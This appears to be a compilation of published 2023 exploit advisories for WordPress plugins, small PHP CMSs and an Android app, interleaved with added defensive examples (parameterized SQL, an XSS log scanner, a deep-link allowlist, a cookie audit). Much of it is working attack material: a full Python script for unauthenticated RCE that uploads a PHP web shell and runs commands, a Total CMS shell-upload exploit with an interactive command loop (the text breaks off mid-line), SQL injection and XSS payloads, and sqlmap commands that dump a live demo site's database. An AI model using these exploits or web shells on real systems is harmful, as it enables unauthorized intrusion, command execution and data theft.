<pre><code>====================================================================================================================================<br />| # Title : WordPress - WPtouch Pro 4 Backup Disclosure Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0(64-bit) |<br />| # Vendor : wptouch.com |<br />| # Dork : /wp-content/wptouch-data/backups |<br />====================================================================================================================================<br /><br />P0C :<br /><br />[+] The plugin exports a backup copy of its own settings to an exposed, unprotected folder, so an attacker can download that backup copy.<br /><br />[+] Dorking in Google or another search engine.<br /><br />[+] Use payload : /wp-content/wptouch-data/backups/<br /><br />[+] https://127.0.0.1/spcporg/wp-content/wptouch-data/backups/wptouch-backup-7cbc55e8c65196efd2fd93657cb370af-20181208-055325.txt<br /><br /><br />Greetings to :=========================================================================================================================<br />jericho * Larry W. Cashdollar * brutelogic * hyp3rlinx * 9aylas * shadow_00715 * LiquidWorm * thelastvvv * Zigoo.eg |<br />=======================================================================================================================================<br /></code></pre>
<pre><code># Exploit Title: Enrollment System Project v1.0 - SQL Injection Authentication Bypass (SQLI)<br /># Date found: 18/05/2023<br /># Exploit Author: VIVEK CHOUDHARY @sudovivek<br /># Version: V1.0<br /># Tested on: Windows 10<br /># Vendor Homepage: https://www.sourcecodester.com<br /># Software Link: https://www.sourcecodester.com/php/14444/enrollment-system-project-source-code-using-phpmysql.html<br /># CVE: CVE-2023-33584<br /># CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-33584<br /><br />Vulnerability Description -<br /><br /> Enrollment System Project V1.0, developed by Sourcecodester, has been found to be vulnerable to SQL Injection (SQLI) attacks. This vulnerability allows an attacker to manipulate the SQL queries executed by the application. The system fails to properly validate user-supplied input in the username and password fields during the login process, enabling an attacker to inject malicious SQL code. By exploiting this vulnerability, an attacker can bypass authentication and gain unauthorized access to the system.<br /><br /><br />Steps to Reproduce -<br /><br /> The following steps outline the exploitation of the SQL Injection vulnerability in Enrollment System Project V1.0:<br /><br /> 1. Launch the Enrollment System Project V1.0 application.<br /><br /> 2. Open the login page by accessing the URL: http://localhost/enrollment/login.php.<br /><br /> 3. In the username and password fields, insert the following SQL Injection payload, shown inside the braces, to bypass authentication: {' or 1=1 #}.<br /><br /> 4. Click the login button to execute the SQL Injection payload.<br /><br /><br />As a result of successful exploitation, the attacker gains unauthorized access to the system and is logged in with administrative privileges.<br /><br /></code></pre>
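Why the payload above works, and what the fix looks like, as an added example that is not part of the advisory or of the Enrollment System code: a login that concatenates the username into its SQL beside a parameterized one, run against a constructed in-memory table. SQLite only understands `--` as a line comment, so the advisory's MySQL `#` tautology is executed here with `--`; the MySQL form is kept only to show the query text it produces.

```python
import sqlite3

# Constructed in-memory stand-in for the application's MySQL user table;
# the real schema and column names are not on the page. Plaintext passwords
# only keep the demo short; real code compares against a password hash.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT, role TEXT)")
    conn.execute("INSERT INTO users VALUES ('admin', 'S3cret!', 'administrator')")
    conn.execute("INSERT INTO users VALUES ('student1', 'pass123', 'student')")
    conn.commit()
    return conn

def rendered_query(username, password):
    """The statement a concatenating login builds; returned for inspection."""
    return ("SELECT username, role FROM users WHERE username='" + username
            + "' AND password='" + password + "'")

def vulnerable_login(conn, username, password):
    """Concatenates raw input into SQL, the pattern behind the advisory."""
    return conn.execute(rendered_query(username, password)).fetchone()

def safe_login(conn, username, password):
    """Parameterized query: the input is bound as data, never parsed as SQL."""
    sql = "SELECT username, role FROM users WHERE username=? AND password=?"
    return conn.execute(sql, (username, password)).fetchone()

# The advisory's payload is ' or 1=1 #  (# is a MySQL line comment).
# SQLite uses -- for line comments, so the same tautology is run with --.
MYSQL_PAYLOAD = "' or 1=1 #"
SQLITE_PAYLOAD = "' or 1=1 -- "

if __name__ == "__main__":
    db = make_db()
    print(rendered_query(MYSQL_PAYLOAD, "anything"))
    print("concatenated:", vulnerable_login(db, SQLITE_PAYLOAD, "anything"))
    print("parameterized:", safe_login(db, SQLITE_PAYLOAD, "anything"))
```

The concatenated query returns the first row (the administrator) for any password, while the parameterized query returns nothing because the quote and comment characters are compared literally.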
<pre><code>C r a C k E r<br />T H E C R A C K O F E T E R N A L M I G H T<br /><br />From The Ashes and Dust Rises An Unimaginable crack....<br /><br />[ Vulnerability ]<br /><br />Author : CraCkEr<br />Website : https://www.totalcms.co/<br />Vendor : Joe Workman<br />Software : Total CMS 1.7.4<br />Vuln Type: Reflected XSS<br />Impact : Manipulate the content of the site<br /><br />Release Notes:<br />==============<br />An attacker who sends the victim a link containing a malicious URL, in an email or instant message, can perform a wide variety of actions, such as stealing the victim's session token or login credentials.<br /><br />Greets:<br /><br />The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL<br /><br />CryptoJob (Twitter) twitter.com/0x0CryptoJob<br /><br />© CraCkEr 2023<br /><br /><br />Path: /blog/<br /><br />GET parameter 'search' is vulnerable to RXSS<br /><br />https://website/blog/?search=yw1cz%22%3e%3cscript%3ealert(1)%3c%2fscript%3eeht7y<br /><br /><br />[-] Done<br /></code></pre>
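The defender's view of the same request: in an access log the payload arrives percent-encoded, so a detector has to decode each query parameter before matching. This is an added example, not part of the advisory; the log lines are constructed (line 1 carries the advisory's `search` payload, line 3 the `<img onerror>` payload from the Circle progress bar advisory further down this page, line 2 is benign).

```python
import re
from urllib.parse import parse_qsl, unquote_plus, urlsplit

# Markers that indicate markup injection once a value has been URL-decoded.
XSS_MARKERS = re.compile(
    r"<\s*script|<\s*(?:img|svg|iframe|body)\b|\bon[a-z]+\s*=|javascript:", re.I)

# Request line inside an Apache/nginx combined-format log entry.
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD)\s+(\S+)\s+HTTP/[\d.]+"')

def decoded_params(request_target):
    """Return (name, value) pairs with percent-encoding and '+' decoded once."""
    return parse_qsl(urlsplit(request_target).query, keep_blank_values=True)

def find_xss_in_line(log_line):
    """Return [(param, decoded value)] for every parameter carrying markup."""
    m = REQUEST_RE.search(log_line)
    if not m:
        return []
    hits = []
    for name, value in decoded_params(m.group(1)):
        # Also test a second decoding so double-encoded input is not missed.
        if any(XSS_MARKERS.search(v) for v in (value, unquote_plus(value))):
            hits.append((name, value))
    return hits

def scan_log(lines):
    """Return (line number, hit) for every hit across a list of log lines."""
    return [(n, hit) for n, line in enumerate(lines, 1)
            for hit in find_xss_in_line(line)]

# Constructed sample log (addresses from the documentation range 203.0.113.0/24).
SAMPLE_LOG = [
    '203.0.113.5 - - [03/Jun/2023:10:13:00 +0000] "GET /blog/?search=yw1cz%22%3e%3cscript%3ealert(1)%3c%2fscript%3eeht7y HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '203.0.113.6 - - [03/Jun/2023:10:14:02 +0000] "GET /blog/?search=champions+league HTTP/1.1" 200 4877 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [03/Jun/2023:10:15:10 +0000] "GET /?title=%3Cimg+src%3Dx+onerror%3Dalert(1)%3E HTTP/1.1" 200 812 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for n, (param, value) in scan_log(SAMPLE_LOG):
        print(f"line {n}: parameter {param!r} contains {value!r}")
```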
<pre><code># Exploit Title: Barebones CMS v2.0.2 - Stored Cross-Site Scripting (XSS) (Authenticated)<br /># Date: 2023-06-03<br /># Exploit Author: tmrswrr<br /># Vendor Homepage: https://barebonescms.com/<br /># Software Link: https://github.com/cubiclesoft/barebones-cms/archive/master.zip<br /># Version: v2.0.2<br /># Tested : https://demo.barebonescms.com/<br /><br /><br />--- Description ---<br /><br />1) Log in to the admin panel and go to "new story":<br />https://demo.barebonescms.com/sessions/127.0.0.1/moors-sluses/admin/?action=addeditasset&type=story&sec_t=241bac393bb576b2538613a18de8c01184323540<br />2) Click the edit button and write your payload in the title field:<br />Payload: "><script>alert(1)</script><br />3) After saving the change, the alert box will appear<br /><br /><br />POST /sessions/127.0.0.1/moors-sluses/admin/ HTTP/1.1<br />Host: demo.barebonescms.com<br />Cookie: PHPSESSID=81ecf7072ed639fa2fda1347883265a4<br />User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0<br />Accept: application/json, text/javascript, */*; q=0.01<br />Accept-Language: en-US,en;q=0.5<br />Accept-Encoding: gzip, deflate<br />Content-Type: application/x-www-form-urlencoded; charset=UTF-8<br />X-Requested-With: XMLHttpRequest<br />Content-Length: 237<br />Origin: https://demo.barebonescms.com<br />Dnt: 1<br />Referer: https://demo.barebonescms.com/sessions/78.163.184.240/moors-sluses/admin/?action=addeditasset&id=1&type=story&lang=en-us&sec_t=241bac393bb576b2538613a18de8c01184323540<br />Sec-Fetch-Dest: empty<br />Sec-Fetch-Mode: cors<br />Sec-Fetch-Site: same-origin<br />Te: trailers<br />Connection: close<br /><br />action=saveasset&id=1&revision=0&type=story&sec_t=a6adec1ffa60ca5adf4377df100719b952d3f596&lang=en-us&title=%22%3E%3Cscript%3Ealert(1)%3C%2Fscript%3E&newtag=&publish_date=2023-06-03&publish_time=12%3A07+am&unpublish_date=&unpublish_time=<br /></code></pre>
<pre><code># Exploit Title: File Manager Advanced Shortcode 2.3.2 - Unauthenticated Remote Code Execution (RCE)<br /># Date: 05/31/2023<br /># Exploit Author: Mateus Machado Tesser<br /># Vendor Homepage: https://advancedfilemanager.com/<br /># Version: File Manager Advanced Shortcode 2.3.2<br /># Tested on: Wordpress 6.1 / Linux (Ubuntu) 5.15<br /># CVE: CVE-2023-2068<br /><br />import requests<br />import json<br />import pprint<br />import sys<br />import re<br /><br />PROCESS = "\033[1;34;40m[*]\033[0m"<br />SUCCESS = "\033[1;32;40m[+]\033[0m"<br />FAIL = "\033[1;31;40m[-]\033[0m"<br /><br />try:<br />    COMMAND = sys.argv[2]<br />    IP = sys.argv[1]<br />    if len(COMMAND) > 1:<br />        pass<br />    if IP:<br />        pass<br />    else:<br />        print(f'Use: {sys.argv[0]} IP COMMAND')<br />except:<br />    pass<br /><br />url = 'http://'+IP+'/' # Path to File Manager Advanced Shortcode Panel<br />print(f"{PROCESS} Searching fmakey")<br /><br />try:<br />    r = requests.get(url)<br />    raw_fmakey = r.text<br />    fmakey = re.findall('_fmakey.*$',raw_fmakey,re.MULTILINE)[0].split("'")[1]<br />    if len(fmakey) == 0:<br />        print(f"{FAIL} Cannot found fmakey!")<br />except:<br />    print(f"{FAIL} Cannot found fmakey!")<br /><br />print(f'{PROCESS} Exploiting Unauthenticated Remote Code Execution via AJAX!')<br />url = "http://"+IP+"/wp-admin/admin-ajax.php"<br />headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.102 Safari/537.36", "Content-Type": "multipart/form-data; boundary=----WebKitFormBoundaryI52DGCOt37rixRS1", "Accept": "*/*"}<br />data = "------WebKitFormBoundaryI52DGCOt37rixRS1\r\nContent-Disposition: form-data; name=\"reqid\"\r\n\r\n\r\n"<br />data += "------WebKitFormBoundaryI52DGCOt37rixRS1\r\nContent-Disposition: form-data; name=\"cmd\"\r\n\r\nupload\r\n"<br />data += "------WebKitFormBoundaryI52DGCOt37rixRS1\r\nContent-Disposition: form-data; name=\"target\"\r\n\r\nl1_Lw\r\n"<br />data += "------WebKitFormBoundaryI52DGCOt37rixRS1\r\nContent-Disposition: form-data; name=\"hashes[l1_cG5nLWNsaXBhcnQtaGFja2VyLWhhY2tlci5wbmc]\"\r\n\r\nexploit.php\r\n"<br />data += "------WebKitFormBoundaryI52DGCOt37rixRS1\r\nContent-Disposition: form-data; name=\"action\"\r\n\r\nfma_load_shortcode_fma_ui\r\n"<br />data += "------WebKitFormBoundaryI52DGCOt37rixRS1\r\nContent-Disposition: form-data; name=\"_fmakey\"\r\n\r\n"+fmakey+"\r\n"<br />data += "------WebKitFormBoundaryI52DGCOt37rixRS1\r\nContent-Disposition: form-data; name=\"path\"\r\n\r\n\r\n"<br />data += "------WebKitFormBoundaryI52DGCOt37rixRS1\r\nContent-Disposition: form-data; name=\"url\"\r\n\r\n\r\n"<br />data += "------WebKitFormBoundaryI52DGCOt37rixRS1\r\nContent-Disposition: form-data; name=\"w\"\r\n\r\nfalse\r\n"<br />data += "------WebKitFormBoundaryI52DGCOt37rixRS1\r\nContent-Disposition: form-data; name=\"r\"\r\n\r\ntrue\r\n"<br />data += "------WebKitFormBoundaryI52DGCOt37rixRS1\r\nContent-Disposition: form-data; name=\"hide\"\r\n\r\nplugins\r\n"<br />data += "------WebKitFormBoundaryI52DGCOt37rixRS1\r\nContent-Disposition: form-data; name=\"operations\"\r\n\r\nupload,download\r\n"<br />data += "------WebKitFormBoundaryI52DGCOt37rixRS1\r\nContent-Disposition: form-data; name=\"path_type\"\r\n\r\ninside\r\n"<br />data += "------WebKitFormBoundaryI52DGCOt37rixRS1\r\nContent-Disposition: form-data; name=\"hide_path\"\r\n\r\nno\r\n"<br />data += "------WebKitFormBoundaryI52DGCOt37rixRS1\r\nContent-Disposition: form-data; name=\"enable_trash\"\r\n\r\nno\r\n"<br />data += "------WebKitFormBoundaryI52DGCOt37rixRS1\r\nContent-Disposition: form-data; name=\"upload_allow\"\r\n\r\ntext/x-php\r\n"<br />data += "------WebKitFormBoundaryI52DGCOt37rixRS1\r\nContent-Disposition: form-data; name=\"upload_max_size\"\r\n\r\n2G\r\n"<br />data += "------WebKitFormBoundaryI52DGCOt37rixRS1\r\nContent-Disposition: form-data; name=\"upload[]\"; filename=\"exploit2.php\"\r\nContent-Type: text/x-php\r\n\r\n<?php system($_GET['cmd']);?>\r\n"<br />data += "------WebKitFormBoundaryI52DGCOt37rixRS1\r\nContent-Disposition: form-data; name=\"mtime[]\"\r\n\r\n\r\n------WebKitFormBoundaryI52DGCOt37rixRS1--\r\n"<br />r = requests.post(url, headers=headers, data=data)<br />print(f"{PROCESS} Sending AJAX request to: {url}")<br />if 'errUploadMime' in r.text:<br />    print(f'{FAIL} Exploit failed!')<br />    sys.exit()<br />elif r.headers['Content-Type'].startswith("text/html"):<br />    print(f'{FAIL} Exploit failed! Try to change _fmakey')<br />    sys.exit(0)<br />else:<br />    print(f'{SUCCESS} Exploit executed with success!')<br />exploited = json.loads(r.text)<br />url = ""<br />print(f'{PROCESS} Getting URL with webshell')<br />for i in exploited["added"]:<br />    url = i['url']<br />print(f"{PROCESS} Executing '{COMMAND}'")<br />r = requests.get(url+'?cmd='+COMMAND)<br />print(f'{SUCCESS} The application returned ({len(r.text)} length):\n'+r.text)<br /><br /></code></pre>
<pre><code># Exploit Title: WordPress Plugin Circle progress bar – Stored Cross-Site Scripting<br /># Date: 2-06-2023<br /># Exploit Author: Taliya Bilal- NightHawk<br /># Vendor Homepage: https://wordpress.org/plugins/circle-progress-bar/<br /># Version: 1.0<br /># Tested on: Firefox<br /># Contact me: taliyabilal765@gmail.com<br /><br /># Steps to reproduce:<br />1. Install the Circle progress bar plugin and activate it.<br />2. Navigate to the Circle progress bar plugin.<br />3. Fill the title field with the XSS payload <img src=x onerror=alert(1)><br />4. Click the preview post option. The popup will appear.<br /><br /># Screenshots:<br />https://freeimage.host/i/Hrbmskv<br />https://freeimage.host/i/Hrbmy4n<br /></code></pre>
<pre><code>RCE Security Advisory<br />https://www.rcesecurity.com<br /><br /><br />1. ADVISORY INFORMATION<br />=======================<br />Product: FC Red Bull Salzburg App<br />Vendor URL: https://play.google.com/store/apps/details?id=laola.redbull<br />Type: Improper Authorization in Handler for Custom URL Scheme [CWE-939]<br />Date found: 2023-04-06<br />Date published: 2023-06-01<br />CVSSv3 Score: 6.1 (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N)<br />CVE: CVE-2023-29459<br /><br /><br />2. CREDITS<br />==========<br />This vulnerability was discovered and researched by Julien Ahrens from<br />RCE Security.<br /><br /><br />3. VERSIONS AFFECTED<br />====================<br />FC Red Bull Salzburg App <= 5.1.9-R<br /><br /><br />4. INTRODUCTION<br />===============<br />The FC Red Bull Salzburg app offers all fans innovative features that enable<br />a modern stadium experience.<br /><br />With various live cams, which can only be accessed inside the Red Bull Arena<br />and show the match from different perspectives, as well as instant replays of<br />all important scenes, a visit to the Red Bull Arena is taken to a new level.<br /><br />(from the vendor's homepage)<br /><br /><br />5. VULNERABILITY DETAILS<br />========================<br />The "FC Red Bull Salzburg App" app for Android exposes an activity called<br />"at.redbullsalzburg.android.AppMode.Default.Splash.SplashActivity".<br /><br />This activity aims to show the contents of a given URL within the app's context.<br />However, the app does not properly validate the URL and the intent's data URI,<br />which an unauthenticated attacker can abuse to load arbitrary contents into the<br />app, either by tricking the user into opening a specially crafted link or by<br />using a malicious app on the same device.<br /><br />The specific problem here is the assumed trust between the user having the app<br />installed and what the app is actually doing/displaying to the user. So if the<br />user sees the app being loaded and automatically redirecting to another page, it<br />can be assumed that the user also trusts the loaded page.<br /><br /><br />6. PROOF OF CONCEPT<br />===================<br />There are two ways to exploit this vulnerability:<br /><br />1. Via the app's custom URI scheme "fcrbs" followed by any arbitrary URL:<br />fcrbs://www.rcesecurity.com<br /><br />2. Via an explicit intent invocation:<br />Intent i = new Intent();<br />i.setComponent(new ComponentName("laola.redbull", "at.redbullsalzburg.android.AppMode.Default.Splash.SplashActivity"));<br />i.setData(Uri.parse("https://www.rcesecurity.com"));<br />startActivity(i);<br /><br /><br />7. SOLUTION<br />===========<br />None. Uninstall the app.<br /><br /><br />8. REPORT TIMELINE<br />==================<br />2023-04-06: Discovery of the vulnerability<br />2023-04-06: RCE Security sends initial notification to vendor via security@redbull.com and to soc@redbull.com<br />2023-04-06: RCE Security asks Intigriti.com for a security contact because of a disagreement with Intigriti's disclosure terms<br />2023-04-06: Intigriti states that they don't hand out contact email addresses of customers<br />2023-04-06: MITRE assigns CVE-2023-29459<br />2023-04-07: Vendor responds stating to submit everything via Intigriti<br />2023-04-07: RCE Security asks for another way to report due to the unacceptable T&Cs of Intigriti<br />2023-04-11: Vendor responds stating that a report to soc@redbull.com is sufficient<br />2023-04-11: RCE Security provides a preliminary version of this advisory<br />2023-04-19: Vendor acknowledges the vulnerability<br />2023-04-19: RCE Security extends disclosure date to its maximum of 45 days<br />2023-05-07: No response from vendor<br />2023-05-07: RCE Security asks vendor for an update since the disclosure date is approaching<br />2023-05-11: No response from vendor<br />2023-05-11: RCE Security asks vendor for an update<br />2023-05-12: Vendor responds stating that more time is needed to fix the bug since the developers are not within the organization<br />2023-05-15: RCE Security reminds the vendor of the disclosure policy and date<br />2023-05-27: No response from vendor<br />2023-05-27: RCE Security sends one last notification and adjusts the disclosure date to 01st June 2023<br />2023-06-01: No response from vendor<br />2023-06-01: Public Disclosure<br /><br /><br />9. REFERENCES<br />=============<br />https://github.com/MrTuxracer/advisories<br />https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-29459<br /></code></pre>
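What the missing validation in section 5 should have looked like, as an added example that is not RCE Security's or the vendor's code: an allowlist check that accepts only https URLs whose host exactly matches a trusted set, written in Python because the logic, not the Android API, is the point. The allowed hosts are constructed placeholders, and the mapping of fcrbs://host/path to https://host/path is an assumption about how the app treats its custom scheme.

```python
from urllib.parse import urlsplit

# Constructed allowlist: the hosts the app legitimately loads are not on the
# page, so these names are placeholders.
ALLOWED_HOSTS = {"app.example-club.test", "www.example-club.test"}
CUSTOM_SCHEME = "fcrbs"

def is_allowed_deeplink(url):
    """True only for an https URL whose host is exactly in the allowlist."""
    try:
        parts = urlsplit(url)
        port = parts.port            # raises ValueError for a malformed port
    except ValueError:
        return False
    if parts.scheme.lower() != "https":
        return False                 # rejects http:, file:, javascript:, fcrbs:
    if parts.username is not None or parts.password is not None:
        return False                 # rejects https://trusted.host@evil.test/
    host = parts.hostname            # already lower-cased by urlsplit
    if host is None or host not in ALLOWED_HOSTS:
        return False                 # exact match: trusted.host.evil.test fails
    if port not in (None, 443):
        return False
    return True

def resolve_deeplink(url):
    """Translate fcrbs://host/path to https://host/path (assumed app behaviour),
    then apply the allowlist. Returns the URL to load, or None to refuse it."""
    prefix = CUSTOM_SCHEME + "://"
    if url.lower().startswith(prefix):
        url = "https://" + url[len(prefix):]
    return url if is_allowed_deeplink(url) else None

if __name__ == "__main__":
    for candidate in ("fcrbs://www.rcesecurity.com",
                      "fcrbs://app.example-club.test/news",
                      "https://app.example-club.test@evil.test/"):
        print(candidate, "->", resolve_deeplink(candidate))
```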
<pre><code># Title: MotoCMS Version 3.4.3 - SQL Injection<br /># Author: tmrswrr<br /># Date: 01/06/2023<br /># Vendor: https://www.motocms.com<br /># Link: https://www.motocms.com/website-templates/demo/189526.html<br /># Vulnerable Version(s): MotoCMS 3.4.3<br /><br /><br />## Description<br />MotoCMS Version 3.4.3 is vulnerable to SQL Injection via the keyword parameter.<br /><br />## Steps to Reproduce<br /><br />1) Visit the URL:<br />https://template189526.motopreview.com/store/category/search/?keyword=1<br /><br />2) Run:<br />sqlmap -u "https://template189526.motopreview.com/store/category/search/?keyword=1" --random-agent --level 5 --risk 3 --batch<br />and then this command:<br />sqlmap -u "https://template189526.motopreview.com/store/category/search/?keyword=1*" --random-agent --level 5 --risk 3 --batch --timeout=10 --drop-set-cookie -o --dump<br /><br />### Parameter & Payloads ###<br /><br />Parameter: keyword (GET)<br /> Type: boolean-based blind<br /> Title: AND boolean-based blind - WHERE or HAVING clause<br /> Payload: keyword=1%' AND 3602=3602 AND 'ZnYV%'='ZnYV<br /><br />Parameter: #1* (URI)<br /> Type: boolean-based blind<br /> Title: AND boolean-based blind - WHERE or HAVING clause<br /> Payload: https://template189526.motopreview.com:443/store/category/search/?keyword=1%' AND 6651=6651 AND 'BvJE%'='BvJE<br /> <br /></code></pre>
<pre><code>## Title: Advance Charity Management-1.0 - TLS cookie without secure flag set - PHPSESSID never expires - current session hijacking<br />## Author: nu11secur1ty<br />## Date: 06.04.2023<br />## Vendor: https://www.sourcecodester.com/users/aown-shah<br />## Software: https://www.sourcecodester.com/php/16607/advance%C2%A0charity-management-system.html<br />## Reference: https://portswigger.net/kb/issues/00500600_cookie-without-httponly-flag-set<br /><br />## Description:<br />The following cookie was issued by the application and does not have<br />the secure flag set:<br />PHPSESSID: The cookie appears to contain a session token, which may<br />increase the risk associated with this issue. You should review the<br />contents of the cookie to determine its function. An attacker can use<br />the same browser on the same machine to connect as the user who was<br />already logged in before that moment, and can then do very nasty things<br />with this already authenticated account. This is a 100% CRITICAL SITUATION<br />if it happens inside the network level 2 of some companies.<br /><br />STATUS: HIGH Vulnerability<br /><br />[+]Exploit:<br />```GET<br />GET /pwnedhost7/members/ HTTP/1.1<br />Host: pwnedhost7.com<br />Accept-Encoding: gzip, deflate<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7<br />Accept-Language: en-US;q=0.9,en;q=0.8<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.91 Safari/537.36<br />Connection: close<br />Cache-Control: max-age=0<br />Upgrade-Insecure-Requests: 1<br />Referer: https://pwnedhost7.com/pwnedhost7/<br />Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="114", "Chromium";v="114"<br />Sec-CH-UA-Platform: Windows<br />Sec-CH-UA-Mobile: ?0<br /><br />```<br /><br />[+]Response:<br />```HTTP<br />HTTP/1.1 200 OK<br />Date: Sun, 04 Jun 2023 10:13:00 GMT<br />Server: Apache/2.4.54 (Win64) OpenSSL/1.1.1p PHP/7.4.30<br />X-Powered-By: PHP/7.4.30<br />Set-Cookie: PHPSESSID=hudiao5n9p6rjld5oaju24lbca; path=/<br />Expires: Thu, 19 Nov 1981 08:52:00 GMT<br />Cache-Control: no-store, no-cache, must-revalidate<br />Pragma: no-cache<br />Connection: close<br />Content-Type: text/html; charset=UTF-8<br />Content-Length: 25629<br /><br /><script type="text/javascript">window.location="login.php"; </script><br /><br /><b>Notice</b>: Undefined index: rainbow_uid in<br /><b>C:\xampp7.4\htdocs\pwnedhost7\members\header.php</b> on line<br /><b>7</b><br /><br /><br /><br /><b>Warning</b>: mysqli_fetch_assoc() expects parameter 1 to be<br />mysqli_result, bool given in<br /><b>C:\xampp7.4\htdocs\pwnedhost7\members\header.php</b> on line<br /><b>12</b><br />```<br /><br />## Reproduce:<br />[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/Aown-Shah/2023/Advance-Charity-Management-1.0)<br /><br />## Proof and Exploit:<br />[href](https://www.nu11secur1ty.com/2023/06/advance-charity-management-10-tls.html)<br /><br />## Time spend:<br />00:37:00<br /><br /><br /></code></pre>
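A small audit of the Set-Cookie line shown in the response above, as an added example that is not part of the advisory or of the Advance Charity Management code: it parses the cookie attributes, reports the missing Secure, HttpOnly and SameSite flags and the absent expiry, and shows the header shape PHP produces once session.cookie_secure, session.cookie_httponly, session.cookie_samesite and session.cookie_lifetime are configured. The raw response below is constructed from the advisory's headers.

```python
# Attributes a session cookie should carry (names compared case-insensitively).
REQUIRED_FLAGS = ("secure", "httponly", "samesite")

def parse_set_cookie(header_value):
    """Split 'NAME=value; attr=val; Flag' into (name, value, {attr: val})."""
    parts = [p.strip() for p in header_value.split(";") if p.strip()]
    name, _, value = parts[0].partition("=")
    attrs = {}
    for part in parts[1:]:
        key, _, val = part.partition("=")
        attrs[key.strip().lower()] = val.strip()
    return name.strip(), value, attrs

def audit_session_cookie(header_value):
    """Return (cookie name, list of findings) for one Set-Cookie header value."""
    name, _, attrs = parse_set_cookie(header_value)
    findings = [f"missing {flag}" for flag in REQUIRED_FLAGS if flag not in attrs]
    if "expires" not in attrs and "max-age" not in attrs:
        findings.append("no expiry: cookie persists for the whole browser session")
    if attrs.get("samesite", "").lower() == "none" and "secure" not in attrs:
        findings.append("SameSite=None requires Secure")
    return name, findings

def audit_response(raw_response):
    """Audit every Set-Cookie header in a raw HTTP response."""
    head = raw_response.split("\r\n\r\n", 1)[0]
    results = []
    for line in head.split("\r\n"):
        if line.lower().startswith("set-cookie:"):
            results.append(audit_session_cookie(line.split(":", 1)[1].strip()))
    return results

def hardened_set_cookie(name, value, max_age=1800):
    """Shape of the header PHP emits with session.cookie_secure=1,
    session.cookie_httponly=1, session.cookie_samesite=Lax and a bounded
    session.cookie_lifetime; the lifetime here is an assumed 30 minutes."""
    return f"{name}={value}; Path=/; Max-Age={max_age}; Secure; HttpOnly; SameSite=Lax"

# Constructed response reproducing the advisory's Set-Cookie line.
SAMPLE_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Server: Apache/2.4.54 (Win64) OpenSSL/1.1.1p PHP/7.4.30\r\n"
    "Set-Cookie: PHPSESSID=hudiao5n9p6rjld5oaju24lbca; path=/\r\n"
    "Content-Type: text/html; charset=UTF-8\r\n"
    "\r\n"
    "<script type=\"text/javascript\">window.location=\"login.php\"; </script>"
)

if __name__ == "__main__":
    for name, findings in audit_response(SAMPLE_RESPONSE):
        print(name, findings)
    print(hardened_set_cookie("PHPSESSID", "hudiao5n9p6rjld5oaju24lbca"))
```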
<pre><code># Exploit Title: Total CMS 1.7.4 - Remote Code Execution (RCE) on File Upload (Authenticated)<br /># Date: 03/06/2023<br /># Exploit Author: tmrswrr<br /># Version: 1.7.4<br /># Vendor home page : https://www.totalcms.co/<br /># Tested Url : https://www.totalcms.co/demo/soccer/<br /># Platform : MACOSX<br /><br />1) Go to this page and click the edit page button<br />https://localhost/demo/soccer/<br />2) Scroll down and you will see the downloads area<br />3) Add a shell.php file in this area<br /><br /><br />?PNG<br />...<br /><?php echo "<pre>";system($_REQUEST['cmd']);echo "</pre>" ?><br />IEND<br /><br />4) Then open this file and pass commands<br /><br />https://localhost/cms-data/depot/cmssoccerdepot/shell.php?cmd=id<br />Result :<br /><br />?PNG ...<br /><br />uid=996(caddy) gid=998(caddy) groups=998(caddy),33(www-data)<br /><br />IEND <br /><br />Exploit: <br /><br />import requests<br /><br />url = input("Enter the URL: ")<br />urll = url + "/rw_common/plugins/stacks/total-cms/totalapi.php"<br /><br />headers = {<br />    'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:89.0) Gecko/20100101 Firefox/89.0',<br />    'Accept': 'application/json',<br />    'Accept-Language': 'en-US,en;q=0.5',<br />    'Accept-Encoding': 'gzip, deflate',<br />    'Cache-Control': 'no-cache',<br />    'X-Requested-With': 'XMLHttpRequest',<br />    'Total-Key': '3c79a3226d86c825bc0c4cb0cca05b17',<br />    'Content-Type': 'multipart/form-data; boundary=---------------------------17104855723143716151436432930',<br />    'Origin': urll,<br />    'Dnt': '1',<br />    'Referer': f'{urll}/demo/soccer/admin/',<br />    'Sec-Fetch-Dest': 'empty',<br />    'Sec-Fetch-Mode': 'cors',<br />    'Sec-Fetch-Site': 'same-origin',<br />    'Te': 'trailers',<br />    'Connection': 'close'<br />}<br /><br />data = '''\<br />-----------------------------17104855723143716151436432930\r\n<br />Content-Disposition: form-data; name="slug"\r\n<br />\r\n<br />cmssoccerdepot\r\n<br />-----------------------------17104855723143716151436432930\r\n<br />Content-Disposition: form-data; name="type"\r\n<br />\r\n<br />depot\r\n<br />-----------------------------17104855723143716151436432930\r\n<br />Content-Disposition: form-data; name="file"; filename="hey.php"\r\n<br />Content-Type: application/x-php\r\n<br />\r\n<br />?PNG<br />...<br /><?php echo "<pre>";system($_REQUEST['cmd']);echo "</pre>" ?><br />IEND\r\n<br />\r\n<br />-----------------------------17104855723143716151436432930--'''<br /><br />while True:<br />    command = input("WRITE YOUR COMMAND ('exit' to quit): ")<br /><br />    if command.lower() == "exit":<br />        break<br /><br />    response = requests.post(url, headers=headers, data=data)<br /><br />    if response.status_code == 200:<br />        shell_path = 